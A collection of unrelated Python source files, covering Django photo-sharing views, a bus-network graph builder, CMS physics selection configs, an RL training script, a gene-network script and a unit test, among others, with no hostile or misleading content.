# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Stand in for xml.etree.ElementTree which imports all its names and
wraps the parse and fromstring functions with expat-exception
conversion.
"""
from xml.etree.ElementTree import *
import faint.svg.expat_util as _expat
import faint as _faint
def _wrap_expat_exception(func):
"""Return the passed in function wrapped with a try-catch turning
document-related expat exceptions into faint.LoadErrors, so that
no parse stack trace is shown for errors in the SVG.
"""
def wrapper(*args, **kwArgs):
try:
return func(*args, **kwArgs)
except ParseError as e:
if _expat.is_document_related(e):
raise _faint.LoadError("Error in file:\n" + str(e))
else:
# Re-raise as internal error
raise
wrapper.__doc__ = func.__doc__
return wrapper
parse = _wrap_expat_exception(parse)
fromstring = _wrap_expat_exception(fromstring)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 31 10:18:52 2018
@author: Urchaug
"""
#python program to find the HCF of two input number
#define a function
def hcf(x,y):
"""this function takes two integers
and returns the HCF"""
# choose the smaller number
if x>y:
smaller = y
else:
smaller = x
for i in range(1,smaller + 1):
if((x%i==0) and (y%i==0)):
hcf = i
return hcf
#take input from user
num1 = int(input("Enter first number:"))
num2 = int(input("Enter second number:"))
print("The H.C.F. of",num1,"and",num2,"is",hcf(num1,num2))
|
from django.shortcuts import render
from django.views.generic import TemplateView, ListView
from django.views.generic import CreateView, DetailView, DeleteView
from django.urls import reverse_lazy
from .forms import PhotoPostForm
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from .models import PhotoPost
class IndexView(ListView):
"""トップページのビュー"""
#index.htmlをレンダリングする
template_name = 'index.html'
#モデルPhotoPostのオブジェクトにorder_by()を適用して投稿日時の降順で並べ替える
queryset = PhotoPost.objects.order_by('-posted_at')
#1ページに表示するレコードの件数
paginate_by = 6
# class IndexView(TemplateView):
# """ トップページのビュー"""
# #index.htmlをレンダリング
# template_name = 'index.html'
#デコレータにより、CreatePhotoViewへのアクセスはログインユーザーに限定される
#ログイン状態でなければsettings.pyのLOGIN_URLにリダイレクトされる
@method_decorator(login_required, name='dispatch')
class CreatePhotoView(CreateView):
"""写真投稿ページのビュー
PhotoPostForm出て意義だれているモデルとフィールドと連携して投稿データをデータベースに登録する
Attributes:
form_class: モデルとフィールドが登録されたフォームクラス
template_name: レンダリングするテンプレート
success_url: データベースへの登録完了後のリダイレクト先
"""
#forms.pyのPhotoPostFormをフォームクラスとして登録
form_class = PhotoPostForm
#レンダリングするテンプレート
template_name = "post_photo.html"
#フォームデータ登録完了後のリダイレクト先
success_url = reverse_lazy('photo:post_success')
def form_valid(self, form):
"""CreateViewクラスのform_valid()をオーバーライド
フォームのバリデーションを通過したときに呼ばれる
フォームデータの登録をここで行う
parameters:
form(django.forms.Form):
スーパークラスのform_valid()の戻り値を返すことで、
success_urlで設定されているURLにリダイレクトさせる
"""
#commit=FalseにしてPOSTされたデータを取得
postdata = form.save(commit=False)
#投稿ユーザーのidを取得してモデルのuserフィールドに格納
postdata.user = self.request.user
#投稿データをデータベースに登録
postdata.save()
#戻り値はスーパークラスのform_valid()の戻り値(HttpResponseRedirect)
return super().form_valid(form)
class PostSuccessView(TemplateView):
"""投稿完了ページのビュー
Attributes:
template_name: レンダリングするテンプレート
"""
#post_success.htmlをレンダリングする
template_name = 'post_success.html'
class CategoryView(ListView):
"""カテゴリページのビュー
Attributes:
tamplate_name: レンダリングするテンプレート
paginate_by: 1ページに表示するレコードの件数
"""
#index.htmlをレンダリングする
template_name = 'index.html'
#1ページに表示するレコードの件数
paginate_by = 6
def get_queryset(self):
"""クエリを実行する
self.kwargsの取得が必要なため、クラス変数querysetではなく、
get_queryset()のオーバーライドによりクエリを実行する
Returns:
クエリによって取得されたレコード
"""
#self.kwargsでキーワードの辞書を取得し、
#categoryキーの値(Categorysテーブルのid)を取得
category_id = self.kwargs['category']
#filter(フィールド名=id)で絞り込む
categories = PhotoPost.objects.filter(category=category_id).order_by('-posted_at')
#クエリによって取得されたレコードを返す
return categories
class UserView(ListView):
"""ユーザー投稿一覧ページのビュー
Attributes:
tamplate_name: レンダリングするテンプレート
paginate_by: 1ページに表示するレコードの件数
"""
#index.htmlをレンダリングする
template_name = 'index.html'
#1ページに表示するレコードの件数
paginate_by = 6
def get_queryset(self):
"""クエリを実行する
self.kwargsの取得が必要なため、クラス変数querysetではなく、
get_queryset()のオーバーライドによりクエリを実行する
Returns:
クエリによって取得されたレコード
"""
#self.kwargsでキーワードの辞書を取得し、
#userキーの値([ユーザー]テーブルのid)を取得
user_id = self.kwargs['user']
#filter(フィールド名=id)で絞り込む
user_list = PhotoPost.objects.filter(user=user_id).order_by('-posted_at')
#クエリによって取得されたレコードを返す
return user_list
class DetailView(DetailView):
"""詳細ページのビュー
投稿記事の詳細を表示するのでDetailViewを継承する
Attributes:
template_name: レンダリングするテンプレート
model: モデルのクラス
"""
#post.htmlをレンダリングする
template_name = 'detail.html'
#クラス変数modelにモデルPhotoPostを設定
model = PhotoPost
class MypageView(ListView):
"""マイページのビュー
Attributes:
tamplate_name: レンダリングするテンプレート
paginate_by: 1ページに表示するレコードの件数
"""
#mypage.htmlをレンダリングする
template_name = 'mypage.html'
#1ページに表示するレコードの件数
paginate_by = 6
def get_queryset(self):
"""クエリを実行する
self.kwargsの取得が必要なため、クラス変数querysetではなく、
get_queryset()のオーバーライドによりクエリを実行する
Returns:
クエリによって取得されたレコード
"""
#現在ログインしているユーザー名はHttpRequest.userに格納されている
#filter(userフィールド=userオブジェクト)で絞り込む
queryset = PhotoPost.objects.filter(user=self.request.user).order_by('-posted_at')
#クエリによって取得されたレコードを返す
return queryset
class PhotoDeleteView(DeleteView):
"""レコードの削除を行うビュー
Attributes:
model: モデル
template_name: レンダリングするテンプレート
paginate_by: 1ページに表示するレコードの件数
success_url: 削除完了後のリダイレクト先のURL
"""
#操作の対象はPhotopostモデル
model = PhotoPost
#photo_delete.htmlをレンダリングする
template_name = 'photo_delete.html'
#処理完了後にマイページにリダイレクト
success_url = reverse_lazy('photo:mypage')
def delete(self, request, *args, **kwargs):
"""レコードの削除を行う
Parameters:
self: PhotoDeleteViewオブジェクト
request: WSGIRequest(HttpRequest)オブジェクト
args: 引数として渡される辞書(dict)
kwargs: キーワード付きの辞書(dict) {pk: 21}のようにレコードのidが渡される
Returns:
HttpResponseRedirect(success_url)を返してsuccess_urlにリダイレクト
"""
#スーパークラスのdelete()を実行
return super().delete(request, *args, **kwargs)
# self.object = self.get_object()
# success_url = self.get_success_url()
# self.object.delete()
# return HttpResponseRedirect(success_url)
|
import FWCore.ParameterSet.Config as cms
import copy
from DisappTrks.StandardAnalysis.Cuts import * # Put all the individual cuts in this file
from DisappTrks.StandardAnalysis.EventSelections import * # Get the composite cut definitions
from DisappTrks.StandardAnalysis.MuonTagProbeSelections import * # Get the composite cut definitions
################################################################################
## Tau tag skim
################################################################################
TauTagSkim = cms.PSet(
name = cms.string("TauTagSkim"),
triggers = triggersSingleTau,
cuts = cms.VPSet (),
)
# See SMP-12-023 for example of W->mu nu selection
tagTauCuts = [
cutTauPt50,
cutTauEta21,
cutTauTightID,
cutTauTightPFIso,
]
addCuts(TauTagSkim.cuts, tagTauCuts)
##################################################
## Cannot go lower than 50 GeV because of trigger
##################################################
TauTagPt50 = copy.deepcopy(TauTagSkim)
TauTagPt50.name = cms.string("TauTagPt50")
cutsToAdd = [
cutTauArbitration,
cutJetPt,
cutJetEta,
cutJetTightLepVeto,
cutTrkPt,
cutTrkTauDR0p1,
cutTrkMatchRecoTau,
cutTrkEta,
cutTrkEcalGapVeto,
cutTrkEtaMuonIneff1,
cutTrkEtaMuonIneff2,
cutTrkFiducialElectron,
cutTrkFiducialMuon,
cutTrkNValidHits,
cutTrkNMissIn,
cutTrkNMissMid,
cutTrkIso,
cutTrkD0,
cutTrkDZ,
]
addCuts(TauTagPt50.cuts, cutsToAdd)
TauTagPt50NoTrig = copy.deepcopy(TauTagPt50)
TauTagPt50NoTrig.name = cms.string("TauTagPt50NoTrig")
TauTagPt50NoTrig.triggers = cms.vstring()
TauTagPt50MetTrig = copy.deepcopy(TauTagPt50)
TauTagPt50MetTrig.name = cms.string("TauTagPt50MetTrig")
TauTagPt50MetTrig.triggers = triggersMet
TauTagPt50MetCut = copy.deepcopy(TauTagPt50)
TauTagPt50MetCut.name = cms.string("TauTagPt50MetCut")
cutsToAdd = [
cutTauMetMinusOne,
]
addCuts(TauTagPt50MetCut.cuts, cutsToAdd)
##################################################
## Channels for real life background estimate. Increase pt threshold to that
## used in search region and add missing outer hits cut.
##################################################
cutsToAdd = [
# cutTrkEcalo,
# cutTrkNMissOut,
]
addCuts(TauTagPt50.cuts, cutsToAdd)
TauTagPt50NoTrig = copy.deepcopy(TauTagPt50)
TauTagPt50NoTrig.name = cms.string("TauTagPt50NoTrig")
TauTagPt50NoTrig.triggers = cms.vstring()
TauTagPt50MetTrig = copy.deepcopy(TauTagPt50)
TauTagPt50MetTrig.name = cms.string("TauTagPt50MetTrig")
TauTagPt50MetTrig.triggers = triggersMet
TauTagPt50MetCut = copy.deepcopy(TauTagPt50)
TauTagPt50MetCut.name = cms.string("TauTagPt50MetCut")
cutsToAdd = [
cutTauMetMinusOne,
]
addCuts(TauTagPt50MetCut.cuts, cutsToAdd)
################################################################################
## Tau tag and probe sample
################################################################################
ZtoTauIsoTrk = copy.deepcopy(MuonTagSkim)
ZtoTauIsoTrk.name = cms.string("ZtoTauIsoTrk")
muTrkCuts = [
cutMuTrkInvMass10,
]
addCuts(ZtoTauIsoTrk.cuts, [cutMuonMT])
addCuts(ZtoTauIsoTrk.cuts, [cutMuonArbitration])
addCuts(ZtoTauIsoTrk.cuts, [cutTrkPt30])
addCuts(ZtoTauIsoTrk.cuts, isoTrkCuts)
addCuts(ZtoTauIsoTrk.cuts, muTrkCuts)
cutsToRemove = [
cutTrkPt,
cutTrkJetDeltaPhi,
]
removeCuts(ZtoTauIsoTrk.cuts, cutsToRemove)
ZtoTauProbeTrk = copy.deepcopy(ZtoTauIsoTrk)
ZtoTauProbeTrk.name = cms.string("ZtoTauProbeTrk")
cutsToAdd = [
cutTrkElecVeto,
cutTrkMuonVeto,
]
addCuts(ZtoTauProbeTrk.cuts, cutsToAdd)
addCuts(ZtoTauProbeTrk.cuts, [cutTrkArbitration])
ZtoTauProbeTrkWithZCuts = copy.deepcopy(ZtoTauProbeTrk)
ZtoTauProbeTrkWithZCuts.name = cms.string("ZtoTauProbeTrkWithZCuts")
cutsToAdd = [
cutMuTrkInvMass40To75,
cutMuTrkOS,
]
addCuts(ZtoTauProbeTrkWithZCuts.cuts, cutsToAdd)
ZtoTauDisTrk = copy.deepcopy(ZtoTauProbeTrkWithZCuts)
ZtoTauDisTrk.name = cms.string("ZtoTauDisTrk")
cutsToAdd = [
cutTrkTauHadVeto,
]
addCuts(ZtoTauDisTrk.cuts, cutsToAdd)
ZtoTauDisTrkWithECaloCut = copy.deepcopy(ZtoTauDisTrk)
ZtoTauDisTrkWithECaloCut.name = cms.string("ZtoTauDisTrkWithECaloCut")
cutsToAdd = [
cutTrkEcalo,
]
addCuts(ZtoTauDisTrkWithECaloCut.cuts, cutsToAdd)
|
import csv
import math
import matplotlib.pyplot as plt
from bisect import bisect_left
import networkx as nx
# specification of the time discrtization step (time interval)
dt = 30
def gen_bus_stop_nodes(G):
with open('Bus_stops_coord.csv', 'r') as bsc:
BusStopsReader = csv.DictReader(bsc)
for row in BusStopsReader:
if row['status'] != 'OP': # virtual bus stops are not represented in the graph for journey planning
continue
G.add_node('b' + str(row['code']), id=row['code'], pos=[float(row['x']), float(row['y'])], station=row['name'], node_type='stop_node', \
zone=row['zone'], section_id=row['section_id'], section_offset=float(row['section_offset']), stop_length=float(row['length']), \
node_graph_type='Bus') # bus stop nodes are names as b+bus_stop_code (e.g. b1)
def gen_bus_route_nodes(G):
stop_list = []
with open('Bus_stops_coord.csv', 'r') as bss:
BusStopSequenceReader = csv.DictReader(bss)
for row in BusStopSequenceReader:
stop_list.append(row['code'])
with open('journeytime.csv', 'r') as jt:
PT_Data = csv.reader(jt)
for row in PT_Data:
if row[0] in stop_list:
G.add_node(row[0] + ',' + row[1] + ',' + row[4], node_id=row[0], line_id=row[1], station=G.nodes['b' + str(row[0])]['station'], \
pos=G.nodes['b' + str(row[0])]['pos'], sequence_number=row[4], node_type='route_node', zone=G.nodes['b' + str(row[0])]['zone'], \
section_id=G.nodes['b' + str(row[0])]['section_id'], section_offset=G.nodes['b' + str(row[0])]['section_offset'], \
stop_length=G.nodes['b' + str(row[0])]['stop_length'], node_graph_type='Bus')
def gen_bus_route_edges(G):
for n in G:
if G.nodes[n]['node_type'] == 'route_node':
for node in G:
if G.nodes[node]['node_type'] == 'route_node':
if G.nodes[n]['line_id'] == G.nodes[node]['line_id'] and int(G.nodes[node]['sequence_number']) == int(G.nodes[n]['sequence_number']) + 1:
G.add_edge(n, node, line_id=G.nodes[node]['line_id'], edge_type='pt_route_edge', up_node_graph_type=G.nodes[n]['node_graph_type'], \
dstr_node_graph_type=G.nodes[node]['node_graph_type'], up_node_type=G.nodes[n]['node_type'], \
dstr_node_type=G.nodes[node]['node_type'], up_node_zone=G.nodes[n]['zone'], dstr_node_zone=G.nodes[node]['zone'])
break
def gen_bus_dep_arr_timetable(G):
dep_time_dict = {}
arr_time_dict = {}
for n in G:
if G.nodes[n]['node_type'] == 'route_node':
dep_time_dict.update({n: {'departure_time': {}, 'sequence_number': G.nodes[n]['sequence_number'], 'line_id': G.nodes[n]['line_id']}})
arr_time_dict.update({n: {'arrival_time': {}, 'sequence_number': G.nodes[n]['sequence_number'], 'line_id': G.nodes[n]['line_id']}})
for node in dep_time_dict:
with open('journeytime.csv', 'r') as jt:
PT_Data = csv.reader(jt)
for row in PT_Data:
if node == row[0] + ',' + row[1] + ',' + row[4]:
r_node_arr_time = int(row[5].split(':')[0]) * 3600 + int(row[5].split(':')[1]) * 60 + int(row[5].split(':')[2])
r_node_dwell_time = int(row[6].split(':')[0]) * 3600 + int(row[6].split(':')[1]) * 60 + int(row[6].split(':')[2])
dep_time_dict[node]['departure_time'].update({row[2]: r_node_arr_time + r_node_dwell_time})
arr_time_dict[node]['arrival_time'].update({row[2]: r_node_arr_time})
# extract timetable in h:m:s format
# for key in dep_time_dict:
# for run_id in dep_time_dict[key]['departure_time']:
# h = str(int(dep_time_dict[key]['departure_time'][run_id] / 3600)) if int(dep_time_dict[key]['departure_time'][run_id]) / 3600 >= 10 else '0' + str(int(dep_time_dict[key]['departure_time'][run_id] / 3600))
# m = str(int(dep_time_dict[key]['departure_time'][run_id] % 3600 / 60)) if int(dep_time_dict[key]['departure_time'][run_id]) % 3600 / 60 >= 10 else '0' + str(int(dep_time_dict[key]['departure_time'][run_id] % 3600 / 60))
# s = str(int(dep_time_dict[key]['departure_time'][run_id] % 3600 % 60)) if int(dep_time_dict[key]['departure_time'][run_id]) % 3600 % 60 >= 10 else '0' + str(int(dep_time_dict[key]['departure_time'][run_id] % 3600 % 60))
# time = h + ':' + m + ':' + s
# dep_time_dict[key]['departure_time'][run_id] = time
# print(dep_time_dict['47,6_2,5'])
return dep_time_dict, arr_time_dict
def assign_bus_edge_dep_timetable(G, departure_timetable):
for e in G.edges:
G[e[0]][e[1]]['departure_time'] = departure_timetable[e[0]]['departure_time']
def find_ge(a, x): # binary search algorithm #'Find leftmost item greater than or equal to x'
i = bisect_left(a, x)
if i != len(a):
return i, a[i]
raise ValueError
def gen_bus_route_edge_waiting_times(G):
discr_waiting_times = dict()
for u, v, weight in G.edges.data():
if weight['edge_type'] == 'pt_route_edge':
discr_waiting_times.update({(u,v): {'wait_time': dict()}})
for t in range(0, 86400, dt):
discr_waiting_times[(u,v)]['wait_time'].update({t: {'discr_value': None, 'veh_id' : None}})
for edge, attrs in discr_waiting_times.items():
sorted_dep_time_dict = {v_id: d_t for v_id, d_t in sorted(G[edge[0]][edge[1]]['departure_time'].items(), key=lambda item: item[1])}
list_of_ptedge_dep_times = list(sorted_dep_time_dict.values())
list_of_ptedge_veh_ids = list(sorted_dep_time_dict.keys())
for time, info in attrs['wait_time'].items():
if time > list_of_ptedge_dep_times[-1]:
earlier_dep_time = list_of_ptedge_dep_times[0]
index = 0
wait_time = earlier_dep_time + (86400-time)
discr_wait_time = wait_time - (wait_time%dt)
elif time < list_of_ptedge_dep_times[0]:
earlier_dep_time = list_of_ptedge_dep_times[0]
index = 0
wait_time = earlier_dep_time - time
discr_wait_time = wait_time - (wait_time%dt)
else:
index, earlier_dep_time = find_ge(list_of_ptedge_dep_times, time)
wait_time = earlier_dep_time - time
discr_wait_time = wait_time - (wait_time%dt)
vehicle_id = list_of_ptedge_veh_ids[index]
info['discr_value'] = discr_wait_time
info['veh_id'] = vehicle_id
return discr_waiting_times
# def assign_bus_edge_waiting_times(G, waiting_times = {}):
# for e in G.edges:
# if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
# G[e[0]][e[1]]['wait_time'] = waiting_times[(e[0], e[1])]
def gen_bus_route_edge_tt(G, departure_timetable, arrival_timetable):
bus_route_sequence = dict()
with open('Bus_stop_sequence.csv', 'r') as bss1:
BusStopSeq1 = csv.DictReader(bss1)
for row in BusStopSeq1:
if row['route_id'] not in bus_route_sequence:
bus_route_sequence.update({row['route_id']: list()})
with open('Bus_stop_sequence.csv', 'r') as bss2:
BusStopSeq2 = csv.DictReader(bss2)
for line in BusStopSeq2:
if row['route_id'] == line['route_id']:
bus_route_sequence[row['route_id']].append(1+int(line['sequence_no']))
bus_route_sequence[row['route_id']].sort()
discr_travel_times = dict()
for edge in G.edges():
if G[edge[0]][edge[1]]['edge_type'] == 'pt_route_edge':
discr_travel_times.update({edge: {'travel_time': dict()}})
v_node_sequence = int(G.nodes[edge[1]]['sequence_number'])
for t in range(0, 86400, dt):
vehicle_run_id = G[edge[0]][edge[1]]['wait_time'][t]['veh_id']
if v_node_sequence == bus_route_sequence[G.nodes[edge[1]]['line_id']][-1]:
in_vehicle_time = arrival_timetable[edge[1]]['arrival_time'][vehicle_run_id] - \
departure_timetable[edge[0]]['departure_time'][vehicle_run_id]
discr_in_vehicle_time = in_vehicle_time - (in_vehicle_time%dt)
discr_travel_times[edge]['travel_time'].update({t: discr_in_vehicle_time})
else:
if vehicle_run_id not in departure_timetable[edge[1]]['departure_time']:
in_vehicle_time = 999999999
discr_in_vehicle_time = in_vehicle_time - (in_vehicle_time%dt)
discr_travel_times[edge]['travel_time'].update({t: discr_in_vehicle_time})
continue
in_vehicle_time = departure_timetable[edge[1]]['departure_time'][vehicle_run_id] - \
departure_timetable[edge[0]]['departure_time'][vehicle_run_id]
discr_in_vehicle_time = in_vehicle_time - (in_vehicle_time%dt)
discr_travel_times[edge]['travel_time'].update({t: discr_in_vehicle_time})
return discr_travel_times
def gen_bus_route_node_transfer_edges(G):
for u in G:
for v in G:
if u != v:
if G.nodes[u]['node_type'] == 'stop_node' and G.nodes[v]['node_type'] == 'route_node' and u == 'b' + str(G.nodes[v]['node_id']):
G.add_edge(u, v, travel_time=5-(5%dt), distance=math.ceil((5-(5%dt)) * 1.2), edge_type='pt_transfer_edge', up_node_graph_type=G.nodes[u]['node_graph_type'], \
dstr_node_graph_type=G.nodes[v]['node_graph_type'], up_node_type=G.nodes[u]['node_type'], \
dstr_node_type=G.nodes[v]['node_type'], up_node_zone=G.nodes[u]['zone'], dstr_node_zone=G.nodes[v]['zone'])
G.add_edge(v, u, travel_time=0, distance=0, edge_type='pt_transfer_edge', up_node_graph_type=G.nodes[v]['node_graph_type'], \
dstr_node_graph_type=G.nodes[u]['node_graph_type'], up_node_type=G.nodes[v]['node_type'], \
dstr_node_type=G.nodes[u]['node_type'], up_node_zone=G.nodes[v]['zone'], dstr_node_zone=G.nodes[u]['zone'])
def gen_assign_bus_route_edge_distances(G):
for e in G.edges:
if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
edge_section_sequence_list = []
with open('Bus_routes.csv', 'r') as br:
BusRouteReader = csv.DictReader(br)
for row in BusRouteReader:
if G[e[0]][e[1]]['line_id'] == row['route_id'] and G.nodes[e[0]]['section_id'] == row['section_id']:
edge_section_sequence_list.append(row['section_id'])
section_seq_num = int(row['sequence_no'])
continue
if edge_section_sequence_list != []:
if row['route_id'] == G[e[0]][e[1]]['line_id'] and int(row['sequence_no']) == section_seq_num + 1:
edge_section_sequence_list.append(row['section_id'])
section_seq_num = int(row['sequence_no'])
if row['section_id'] == G.nodes[e[1]]['section_id']:
break
seg_edge_dist = 0
for section_id in edge_section_sequence_list:
if section_id == edge_section_sequence_list[-1]:
seg_edge_dist += G.nodes[e[1]]['section_offset'] + G.nodes[e[1]]['stop_length']
break
with open('road_segments_poly.csv', 'r') as rsp:
SegmentPolylineReader1 = csv.DictReader(rsp)
for row in SegmentPolylineReader1:
if section_id == row['id']:
with open('road_segments_poly.csv', 'r') as rsp:
SegmentPolylineReader2 = csv.DictReader(rsp)
for line in SegmentPolylineReader2:
if section_id == line['id'] and int(line['seq_id']) == int(row['seq_id']) + 1:
seg_edge_dist += math.sqrt(sum([(a - b) ** 2 for a, b in zip((float(row['x']), float(row['y'])), (float(line['x']), float(line['y'])))]))
break
if section_id == edge_section_sequence_list[0]:
seg_edge_dist -= G.nodes[e[0]]['section_offset']
G[e[0]][e[1]]['distance'] = math.ceil(seg_edge_dist)
def gen_assign_bus_edge_cost(G):
costs = {(0, 23399): 0.0019, (23400, 34200): 0.0029, (34201, 57599): 0.0019, (57600, 68400): 0.0029, \
(68401, 86399): 0.0019}
costs_dict = dict()
for e in G.edges:
if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
costs_dict.update({e: {'pt_cost': dict()}})
for t in range(0, 86400, dt):
for time_interval in costs:
if t >= time_interval[0] and t <= time_interval[1]:
cost = math.ceil(costs[time_interval] * G[e[0]][e[1]]['distance'])
costs_dict[e]['pt_cost'].update({t: cost})
break
else:
costs_dict.update({e: {'pt_cost': 0}})
return costs_dict
#---------------------------------------------------------------------------------------------------------------------------
# -------function calculates and assign the time-dependent zone-to-zone cost for zone-to-zone fare schemes; in transfer edges the cost is zero-------
# def gen_assign_bus_edge_zone_to_zone_cost(G): # the cost tables is hardcoded here
# zone_to_zone_cost = {(0, 23399): {('1', '1'): 16, ('1', '2'): 16, ('1', '3'): 20.5, ('2', '1'): 16, ('2', '2'): 16, ('2', '3'): 16, ('3', '1'): 20.5, ('3', '2'): 16, ('3', '3'): 16}, (23400, 34200): {('1', '1'): 20, ('1', '2'): 20, ('1', '3'): 24.5, ('2', '1'): 20, ('2', '2'): 20, ('2', '3'): 20, ('3', '1'): 24.5, ('3', '2'): 20, ('3', '3'): 20}, (34201, 57599): {('1', '1'): 16, ('1', '2'): 16, ('1', '3'): 20.5, ('2', '1'): 16, ('2', '2'): 16, ('2', '3'): 16, ('3', '1'): 20.5, ('3', '2'): 16, ('3', '3'): 16}, (57600, 68400): {('1', '1'): 20, ('1', '2'): 20, ('1', '3'): 24.5, ('2', '1'): 20, ('2', '2'): 20, ('2', '3'): 20, ('3', '1'): 24.5, ('3', '2'): 20, ('3', '3'): 20}, (68401, 86399): {('1', '1'): 16, ('1', '2'): 16, ('1', '3'): 20.5, ('2', '1'): 16, ('2', '2'): 16, ('2', '3'): 16, ('3', '1'): 20.5, ('3', '2'): 16, ('3', '3'): 16}}
# # morning_off_peak = (0, 23399)
# # morning_peak = (23400, 34200)
# # afternoon_off_peak = (34201, 57599)
# # evening_peak = (57600, 68400)
# # evening_off_peak = (68401, 86399)
# for e in G.edges:
# if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
# G[e[0]][e[1]]['pt_zone_to_zone_cost'] = zone_to_zone_cost
# else:
# G[e[0]][e[1]]['pt_zone_to_zone_cost'] = 0
#---------------------------------------------------------------------------------------------------------------
def assign_bus_stop_access_nodes(G):
for stop in G:
if G.nodes[stop]['node_type'] == 'stop_node':
G.nodes[stop]['access_segs_id'] = []
G.nodes[stop]['access_links_id'] = []
G.nodes[stop]['access_nodes_id'] = []
with open('Bus_stops_coord.csv', 'r') as bsc:
BusStopAccessReader = csv.DictReader(bsc)
for row in BusStopAccessReader:
if 'b' + str(row['code']) == stop:
G.nodes[stop]['access_segs_id'].append(row['section_id'])
for access_segment in G.nodes[stop]['access_segs_id']:
with open('road_segments.csv', 'r') as rs:
RoadSegmentReader = csv.DictReader(rs)
for row in RoadSegmentReader:
if access_segment == row['id']:
G.nodes[stop]['access_links_id'].append(row['link_id'])
break
for link in G.nodes[stop]['access_links_id']:
with open('Road_links.csv', 'r') as rl:
RoadLinksReader = csv.DictReader(rl)
for row in RoadLinksReader:
if link == row['id']:
if row['from_node'] not in G.nodes[stop]['access_nodes_id']:
G.nodes[stop]['access_nodes_id'].append(row['from_node'])
if row['to_node'] not in G.nodes[stop]['access_nodes_id']:
G.nodes[stop]['access_nodes_id'].append(row['to_node'])
break
## ---- function that plots the train graph----------
#def plot_bus_graph(G):
# pos = nx.get_node_attributes(G, 'pos')
# nx.draw_networkx(G, pos) # Graph with node attributes
# plt.show()
##------------------------------------------------------------- |
import random
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten
from keras.optimizers import Adam
import opensim as osim
import sys
from rl.policy import BoltzmannQPolicy
from rl.agents import SARSAAgent
#from rl.random import OrnsteinUhlenbeckProcess
from osim.env import *
from osim.http.client import Client
import argparse
import math
ENV_NAME = 'Human'
# Command line parameters
parser = argparse.ArgumentParser(description='Train or test neural net motor controller')
parser.add_argument('--steps', dest='EPISODES', action='store', default=10000, type=int)
parser.add_argument('--visualize', dest='visualize', action='store_true', default=False)
args = parser.parse_args()
# Get the environment and extract the number of actions.
env = RunEnv(args.visualize)
np.random.seed(123)
env.seed(123)
nb_actions = env.action_space.shape[0]
# Next, we build a very simple model.
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(nb_actions))
model.add(Activation('linear'))
print(model.summary())
# SARSA does not require a memory.
policy = BoltzmannQPolicy()
sarsa = SARSAAgent(model=model, nb_actions=nb_actions, nb_steps_warmup=10, policy=policy)
sarsa.compile(Adam(lr=1e-3), metrics=['mae'])
# Okay, now it's time to learn something! We visualize the training here for show, but this
# slows down training quite a lot. You can always safely abort the training prematurely using
# Ctrl + C.
sarsa.fit(env, nb_steps=args.EPISODES, visualize=False, verbose=2)
# After training is done, we save the final weights.
sarsa.save_weights('sarsa_{}_weights.h5f'.format(ENV_NAME), overwrite=True)
# Finally, evaluate our algorithm for 5 episodes.
sarsa.test(env, nb_episodes=5, visualize=True)
|
import pandas as pd
import scipy.stats as sci
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import numpy as np
import glob
from decimal import Decimal
import networkx as nx
def makePPIandTransfacFile():
out_file = open('../rawData/PPIandTRANSFAC.txt','w+')
print 'get ppi network'
sym2entz_file = open("../rawData/sym2entz.txt")
entz2sym = {}
header=True
for line in sym2entz_file.xreadlines():
if header: header=False; continue
sym, entz = line.replace('\n','').replace('\r','').split('\t')
if entz != '':
entz2sym[entz] = sym
sym2entz_file.close()
####
read_file = open("../rawData/BIOGRID-ORGANISM-Homo_sapiens-3.4.148.mitab.txt")
for line in read_file.xreadlines():
if line.startswith('#'): continue
line_list = line.replace('\n','').split('\t')
if line_list[11] not in ['psi-mi:"MI:0915"(physical association)','psi-mi:"MI:0407"(direct interaction)']: continue
g1 = line_list[0].split('locuslink:')[1]
g2 = line_list[1].split('locuslink:')[1]
if g1 not in entz2sym.keys() or g2 not in entz2sym.keys():
continue
out_file.write(entz2sym[g1]+'\t'+entz2sym[g2]+'\tPP\n')
out_file.write(entz2sym[g2]+'\t'+entz2sym[g1]+'\tPP\n')
read_file.close()
print 'get transfac network'
read_file = open("../rawData/TRANSFAC.txt")
for line in read_file.xreadlines():
line_list = line.replace('\n','').replace('\r','').split('\t')
if len(line_list) != 2:
continue
[tf, tgs] = line_list
for tg in tgs.split('|'):
out_file.write(tf+'\t'+tg+'\tPG\n')
read_file.close()
out_file.close()
def getNetInfo():
net = nx.DiGraph()
in_file = open('../rawData/PPIandTRANSFAC.txt')
for line in in_file.xreadlines():
[stt, end, info] = line.replace('\n','').split('\t')
net.add_edge(stt,end,weight=info)
in_file.close()
return net
if __name__ == '__main__':
#makePPIandTransfacFile()
net = getNetInfo()
stt_list = [sym for sym in net.nodes() if sym.startswith('MAP2K')]
for stt in stt_list:
if not nx.has_path(net, stt, 'EIF4E'): continue
shPaths = list(nx.all_shortest_paths(net, stt, 'EIF4E'))
for shPath in shPaths:
info_list = []
for ii in range(len(shPath)-1):
info_list.append(net[shPath[ii]][shPath[ii+1]]['weight'])
if info_list == ['PP','PP','PG']:
print '##',shPath
|
import pandas as pd
import numpy as np
import unittest
from dstools.preprocessing.OneHotEncoder import OneHotEncoder
class TestOneHotEncoder(unittest.TestCase):
def compare_DataFrame(self, df_transformed, df_transformed_correct):
"""
helper function to compare the values of the transformed DataFrame with the values of a correctly transformed DataFrame
"""
#same number of columns
self.assertEqual(len(df_transformed.columns), len(df_transformed_correct.columns))
#check for every column in correct DataFrame, that all items are equal
for column in df_transformed_correct.columns:
#compare every element
for x, y in zip(df_transformed[column], df_transformed_correct[column]):
#if both values are np.NaN, the assertion fails, although they are equal
if np.isnan(x)==True and np.isnan(y)==True:
pass
else:
self.assertEqual(x, y)
def test_only_non_numeric(self):
"""
only columns containing non numerical values should be encoded
"""
df = pd.DataFrame({'x1':[1,2], 'x2':['a','b']})
